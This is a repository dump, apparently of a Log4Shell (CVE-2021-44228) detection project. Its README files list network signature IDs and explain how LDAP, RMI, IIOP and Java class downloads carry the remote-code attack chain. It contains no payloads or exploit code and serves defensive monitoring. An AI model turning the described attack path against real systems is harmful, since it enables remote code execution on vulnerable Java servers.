RCE Attempt - Nested upper (tcp) (CVE-2021-44228) | 65 | | 2034709 | 2034795 | ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (CVE-2021-44228) | 66 | 67 | 68 | ## Bypass "Hunting" Rules 69 | 70 | | Inbound SID | Outbound SID | msg | 71 | |-------------|--------------|--------------------------------------------------------------------------------------------------| 72 | | 2034661 | 2034783 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol TCP (CVE-2021-44228) | 73 | | 2034662 | 2034784 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol UDP (CVE-2021-44228) | 74 | | 2034663 | 2034785 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228) | 75 | | 2034664 | 2034801 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228) | 76 | | 2034665 | 2034802 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228) | 77 | | 2034666 | 2034803 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228) | 78 | | 2034808 | | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228) | 79 | | 2034809 | | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228) | 80 | | 2034810 | | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228) | 81 | | 2034811 | | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228) | 82 | -------------------------------------------------------------------------------- /detection_details/IIOP/README.md: -------------------------------------------------------------------------------- 1 | # Log4Shell IIOP Traffic 2 | Log4Shell attack strings which include `iiop://` can result in Internet Interop-Orb-Protocol (IIOP) connection requests. 3 | The signatures detailed below attempt to detection this IIOP traffic. 4 | 5 | A pcap of non-malicious IIOP traffic can be found on [Cloudshark](https://www.cloudshark.org/captures/d706cd5c3906?filter=giop) 6 | 7 | Details of the protocol can be found via [Oracle documentation](https://docs.oracle.com/cd/E13211_01/wle/wle42/corba/giop.pdf) 8 | 9 | # Example Traffic 10 | ![](images/iiop_request.png) 11 | 12 | 13 | # Detection Logic 14 | Network detection for IIOP, which is largely GIOP (General Inter-ORB Protocol) over TCP/IP focuses on alerting of an 15 | Outbound request followed by a valid GIOP message from the server. 16 | 17 | ## Outbound Request 18 | 19 | | sid | msg | Notes | Detection Screenshot | 20 | |---------|--------------------------------------|--------------|-------------------------------| 21 | | 2034730 | ET POLICY GIOP/IIOP Request Outbound | sets flowbit | [2034730](images/2034730.png) | 22 | 23 | ## Successful Response 24 | | sid | msg | Notes | Detection Screenshot | 25 | |---------|-------------------------------------------------|----------------------|-------------------------------| 26 | | 2034731 | ET POLICY Successful GIOP/IIOP Request Outbound | depends on `2034730` | [2034731](images/2034731.png) | 27 | -------------------------------------------------------------------------------- /detection_details/IIOP/images/2034730.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/IIOP/images/2034730.png -------------------------------------------------------------------------------- /detection_details/IIOP/images/2034731.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/IIOP/images/2034731.png -------------------------------------------------------------------------------- /detection_details/IIOP/images/iiop_request.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/IIOP/images/iiop_request.png -------------------------------------------------------------------------------- /detection_details/Java_Class_Download/README.md: -------------------------------------------------------------------------------- 1 | # Log4Shell Java Class Payload Downloads 2 | During the RCE path for Log4Shell attempts, it is common to see the vulnerable application request a Java Payload from 3 | a webserver. The signatures detailed below attempt to detect this behavior. 4 | 5 | # Example Traffic 6 | ![](images/download.png) 7 | 8 | # Detection Logic 9 | In order to detect outbound requests for a Java Class, a flowbit will be used to first identify an outbound request 10 | from Java, with a Class file or a Serialized object returned. It is important to note that this is not indicate malicous 11 | traffic, however given this behavior in the Log4Shell RCE path, alerts from these signatures, with great attention paid 12 | to the [Class Download Rules](#class-response-rules), warrant investigation. 13 | 14 | ## Java Client HTTP Requests 15 | These signatures are designed to set a flowbit on an HTTP Request by a Java application as determined by the User-Agent 16 | of the request. 17 | 18 | | sid | msg | Example UA | Flowbit Set | Alerting | 19 | |---------|---------------------------------------------------|-------------------|-------------------------------|----------| 20 | | 2013035 | ET POLICY Java Client HTTP Request | `Java/` | ET.http.javaclient | False | 21 | | 2011581 | ET POLICY Vulnerable Java Version 1.5.x Detected | `Java/1.5.0` | ET.http.javaclient.vulnerable | True | 22 | | 2011582 | ET POLICY Vulnerable Java Version 1.6.x Detected | `Java/1.6.0_210` | ET.http.javaclient.vulnerable | True | 23 | | 2011584 | ET POLICY Vulnerable Java Version 1.4.x Detected | `Java/1.4.0` | ET.http.javaclient.vulnerable | True | 24 | | 2014297 | ET POLICY Vulnerable Java Version 1.7.x Detected | `Java/1.7.0_300.` | ET.http.javaclient.vulnerable | True | 25 | | 2019401 | ET POLICY Vulnerable Java Version 1.8.x Detected | `Java/1.8.0_290` | ET.http.javaclient.vulnerable | True | 26 | | 2025314 | ET POLICY Vulnerable Java Version 9.0.x Detected | `Java/9.0` | ET.http.javaclient.vulnerable | True | 27 | | 2025518 | ET POLICY Vulnerable Java Version 10.0.x Detected | `Java/10.0.0` | ET.http.javaclient.vulnerable | True | 28 | | 2028867 | ET POLICY Vulnerable Java Version 11.0.x Detected | `Java/11.0.12` | ET.http.javaclient.vulnerable | True | 29 | | 2028868 | ET POLICY Vulnerable Java Version 12.0.x Detected | `Java/12.0.1` | ET.http.javaclient.vulnerable | True | 30 | | 2028869 | ET POLICY Vulnerable Java Version 13.0.x Detected | `Java/13.0.1` | ET.http.javaclient.vulnerable | True | 31 | | 2034814 | ET POLICY Vulnerable Java Version 14.0.x Detected | `Java/14.0.1` | ET.http.javaclient.vulnerable | True | 32 | | 2034815 | ET POLICY Vulnerable Java Version 15.0.x Detected | `Java/15.0.1` | ET.http.javaclient.vulnerable | True | 33 | | 2034816 | ET POLICY Vulnerable Java Version 16.0.x Detected | `Java/16.0.1` | ET.http.javaclient.vulnerable | True | 34 | | 2034817 | ET POLICY Vulnerable Java Version 17.0.x Detected | `Java/17.0.0` | ET.http.javaclient.vulnerable | True | 35 | 36 | 37 | ## Class Response Rules 38 | The following rules depend on either `ET.http.javaclient.vulnerable` or `ET.http.javaclient` to be set on the outgoing 39 | response 40 | 41 | | sid | msg | Flowbit Required | Detection Screenshot | 42 | |---------|---------------------------------------------------------|-------------------------------|--------------------------------------------| 43 | | 2014474 | ET INFO JAVA - Java Class Download | ET.http.javaclient | [2014474](images/2014474.png) | 44 | | 2014475 | ET INFO JAVA - Java Class Download By Vulnerable Client | ET.http.javaclient.vulnerable | [2014475](images/2014475.png) | 45 | | 2016502 | ET INFO Java Serialized Data via vulnerable client | ET.http.javaclient.vulnerable | | 46 | | 2016503 | ET INFO Java Serialized Data | ET.http.javaclient | | 47 | 48 | 49 | -------------------------------------------------------------------------------- /detection_details/Java_Class_Download/images/2014474.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/Java_Class_Download/images/2014474.png -------------------------------------------------------------------------------- /detection_details/Java_Class_Download/images/2014475.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/Java_Class_Download/images/2014475.png -------------------------------------------------------------------------------- /detection_details/Java_Class_Download/images/download.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/Java_Class_Download/images/download.png -------------------------------------------------------------------------------- /detection_details/LDAP/README.md: -------------------------------------------------------------------------------- 1 | # Log4Shell LDAP Traffic 2 | Log4Shell attack strings which include `ldap://` can result in ldap queries to "malicious ldap" servers for java 3 | objects. The signatures detailed below attempt to detect this ldap traffic. Most often, this is not the actual 4 | payload, but will result in an actual [Java Class Payload](../Java_Class_Download/README.md) betting downloaded from a webserver. 5 | 6 | # Example Traffic 7 | Anonymous LDAPv3 Request with Java Class Response 8 | 9 | ![](images/anon_ldap_with_payload.png) 10 | 11 | # Detection Logic 12 | Multiple signatures have been created in order to detect the different stages of pulling down the java payload via LDAP. 13 | 14 | ## Outbound Request 15 | 16 | | sid | msg | Detection Screenshot | 17 | |---------|------------------------------------------------------|------------------------------------------------------| 18 | | 2034704 | ET POLICY Anonymous LDAPv3 Bind Request Outbound | [2034704](images/anon_ldap_with_payload_request.png) | 19 | | 2034812 | ET POLICY Non-Anonymous LDAPv3 Bind Request Outbound | [2034812](images/non-anon_ldap_request.png) | 20 | 21 | 22 | 23 | ## Successful Response 24 | 25 | | sid | msg | Detection Screenshot | 26 | |---------|-----------------------------------------------------------------|-------------------------------------------------------| 27 | | 2034705 | ET POLICY Successful Anonymous LDAPv3 Bind Request Outbound | [2034705](images/anon_ldap_with_payload_response.png) | 28 | | 2034771 | ET POLICY Successful Non-Anonymous LDAPv3 Bind Request Outbound | [2034771](images/non-anon_ldap_response.png) | 29 | 30 | 31 | 32 | ## Payload Delivery 33 | ### Attack Response 34 | 35 | These signatures were created based on observed malicious samples. 36 | 37 | | sid | msg | Detection Screenshot | 38 | |---------|---------------------------------------------------------------------------|----------------------------------------------------------------| 39 | | 2034722 | ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response | [2034722](images/anon_ldap_with_payload_response_payload.png) | 40 | | 2034769 | ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response M2 | [2034769](images/anon_ldap_with_payload_response_payload2.png) | 41 | 42 | ### Policy 43 | These Signatures are designed to detect broadly Java objects being returned from LDAP and have been created in effort 44 | to reduce false negatives. 45 | 46 | | sid | msg | Note | Detection Screenshot | 47 | |---------|-----------------------------------------------------------------------------|----------------------|--------------------------------------------| 48 | | 2034770 | ET POLICY JavaClass Returned Via Anonymous Outbound LDAPv3 Bind Request | depends on `2034704` | [2034770](images/ldap_javaClass.png) | 49 | | 2034772 | ET POLICY JavaClass Returned Via Non-Anonymous Outbound LDAPv3 Bind Request | depends on `2034812` | [2034772](images/ldap_javaClass.png) | 50 | | 2034818 | ET POLICY Serialized Java Object returned via LDAPv3 Response | | [2034818](images/ldap_serialized_java.png) | 51 | -------------------------------------------------------------------------------- /detection_details/LDAP/images/anon_ldap_with_payload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/LDAP/images/anon_ldap_with_payload.png -------------------------------------------------------------------------------- /detection_details/LDAP/images/anon_ldap_with_payload_request.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/LDAP/images/anon_ldap_with_payload_request.png -------------------------------------------------------------------------------- /detection_details/LDAP/images/anon_ldap_with_payload_response.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/LDAP/images/anon_ldap_with_payload_response.png -------------------------------------------------------------------------------- /detection_details/LDAP/images/anon_ldap_with_payload_response_payload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/LDAP/images/anon_ldap_with_payload_response_payload.png -------------------------------------------------------------------------------- /detection_details/LDAP/images/anon_ldap_with_payload_response_payload2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/LDAP/images/anon_ldap_with_payload_response_payload2.png -------------------------------------------------------------------------------- /detection_details/LDAP/images/ldap_javaClass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/LDAP/images/ldap_javaClass.png -------------------------------------------------------------------------------- /detection_details/LDAP/images/ldap_serialized_java.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/LDAP/images/ldap_serialized_java.png -------------------------------------------------------------------------------- /detection_details/LDAP/images/non-anon_ldap_request.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/LDAP/images/non-anon_ldap_request.png -------------------------------------------------------------------------------- /detection_details/LDAP/images/non-anon_ldap_response.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/LDAP/images/non-anon_ldap_response.png -------------------------------------------------------------------------------- /detection_details/RMI/README.md: -------------------------------------------------------------------------------- 1 | # Log4Shell RMI Traffic 2 | Log4Shell attack strings which include `rmi://` can result in an Remote Method Invocation (RMI) connection to 3 | "malicious RMI" servers for java objects. The signatures detailed below attempt to detection this RMI traffic. 4 | 5 | The Wire Protocol for RMI is described within [Oracle Documentation](https://docs.oracle.com/javase/9/docs/specs/rmi/protocol.html) 6 | 7 | # Example Traffic 8 | ![](images/traffic_example.png) 9 | 10 | # Detection Logic 11 | Network detection for RMI focuses on alerting of an Outbound request followed by a Java Payload being returned by the 12 | RMI server. 13 | 14 | ## Outbound Request 15 | 16 | | sid | msg | Notes | Detection Screenshot | 17 | |---------|--------------------------------|--------------|----------------------------------------| 18 | | 2034718 | ET POLICY RMI Request Outbound | sets flowbit | [2034718](images/outbound_request.png) | 19 | 20 | ## Successful Response 21 | A successful response is a packet starting with \x4e. Due to the short and dynamic nature of a server reply, a 22 | signature was not created for a Successful Response. 23 | 24 | ## Payload Delivery 25 | The objective of using RMI is to deliver a Java Payload which will be run by the application. There are two signatures 26 | which will alert on Java Payloads returned via an RMI connection. 27 | 28 | ## Serialized and Unserialized Java Payload 29 | 30 | | sid | msg | Notes | Detection Screenshot | 31 | |---------|------------------------------------------------------|----------------------|-------------------------------| 32 | | 2034748 | ET POLICY Serialized Java Payload via RMI Response | depends on `2034718` | [2034748](images/2034748.png) | 33 | | 2034749 | ET POLICY Unserialized Java Payload via RMI Response | depends on `2034718` | | 34 | -------------------------------------------------------------------------------- /detection_details/RMI/images/2034748.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/RMI/images/2034748.png -------------------------------------------------------------------------------- /detection_details/RMI/images/outbound_request.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/RMI/images/outbound_request.png -------------------------------------------------------------------------------- /detection_details/RMI/images/traffic_example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EmergingThreats/log4shell-detection/7c977a1b59a77f0cf81d972296b60eeb9c86b200/detection_details/RMI/images/traffic_example.png --------------------------------------------------------------------------------